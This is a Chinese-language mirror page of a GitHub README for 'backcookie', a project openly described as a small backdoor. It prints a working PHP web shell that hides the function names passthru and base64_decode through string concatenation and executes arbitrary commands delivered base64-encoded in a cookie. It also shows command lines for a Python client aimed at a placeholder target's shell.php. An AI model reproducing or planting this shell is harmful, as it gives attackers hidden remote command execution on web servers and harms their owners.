项目作者: jofpin

项目描述 :
Small backdoor using cookie.
高级语言: Python
项目地址: git://github.com/jofpin/backcookie.git
创建时间: 2014-03-09T23:31:55Z
项目社区:https://github.com/jofpin/backcookie

开源协议:

下载


backcookie

Small backdoor using cookie.

==========

  1. <?php
  2. # the code of the backdoor used
  3. $bOne = "pa"."ss"."th"."ru";
  4. $bTwo = "ba"."se"."64"."_"."de"."co"."de";
  5. $bKey = "yourcookie"; # conection backdoor
  6. $bOne($bTwo($_COOKIE[$bKey]));
  7. ?>
  1. Example one: python backcookie.py -u http://target.com/shell.php -c name_cookie
  1. Example two: python backcookie.py --url http://target.com/shell.php --cookie name_cookie

Custom command (binfo), You get objective information

  1. @pwned:~$ binfo

Custom command (exit), to exit.

  1. @pwned:~$ exit

Happy hacking!


Copyright, 2013 - 2016 by Jose Pino